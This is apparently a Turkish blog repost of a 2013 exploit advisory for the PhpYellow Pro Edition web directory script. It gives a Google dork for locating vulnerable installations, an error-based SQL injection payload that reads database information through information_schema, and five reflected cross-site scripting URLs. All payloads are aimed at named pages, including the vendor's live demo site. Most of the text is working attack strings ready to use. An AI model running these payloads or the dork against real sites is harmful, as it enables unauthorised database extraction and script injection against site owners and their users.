PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities

PhpYellow Pro Edition XSS/SQL Injection Açıkları bulundu.
Açıkla MYSQL veri tabanını bağlanılarak bilgiler alınabilmekte, XSS açıklarıyla zararlı kodlar çalıştırabilmekte.
Açık Exploit

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities
# Date: 2013-1-27
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://phpyellow.com/
# Category: webapps/php
# Price: $499.95
# Google dork: inurl:"/search/search4needles.php"
##########################################
 
# Error Based SQL Injection:
-Exploit-
http://site/directory/search/search4needles.php?search=subindex&haystack=[error-based injection]&needle=1
-Demo-
http://phpyellow.com/directory/search/search4needles.php?search=subindex&haystack=(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)x)&needle=1
 
# Reflected XSS:
-Demo-
http://phpyellow.com/directory/search/alpha_cat.php?L="><script>alert(1)</script>
http://phpyellow.com/directory/modules/popular_cities/scripts/city.php?city="><script>alert(2)</script>
http://phpyellow.com/directory/search/search4needles.php?search=top+cities&haystack="><script>alert(3)</script>
http://phpyellow.com/directory/profile.php?listing_property=8&profile_item="><script>alert(4)</script>
http://phpyellow.com/directory/search/search_advanced.php?search="><script>alert(5)</script>
 
# BECC55EC920E93FC   1337day.com [2013-01-27]   214750033779CE53 #
 

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir